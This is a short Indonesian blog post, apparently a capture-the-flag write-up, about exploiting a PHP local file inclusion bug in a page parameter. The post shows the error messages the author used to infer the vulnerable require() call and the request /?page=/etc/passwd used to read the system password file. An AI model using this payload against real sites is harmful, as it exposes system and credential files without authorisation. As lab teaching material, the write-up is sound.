pada soal saya diberikan sebuah halaman web yang memiliki vuln pada /?page=lorem.php sekarang saya coba ganti lorem.php menjadi dekguh25 maka akan muncul sebuah error.
Warning: require(dekguh25): failed to open stream: No such file or directory in /var/www/html/index.php on line 43errornya seperti diatas, kalau saya trawang kemungkinan kodenya seperti ini
Fatal error: require(): Failed opening required 'dekguh25' (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/html/index.php on line 43
require($_GET["page"])diatas adalah code yang vuln, jadi bisa kita gunakan untuk mengambil file password dengan query seperti ini /?page=/etc/passwd maka akan muncul flagnya
No comments:
Post a Comment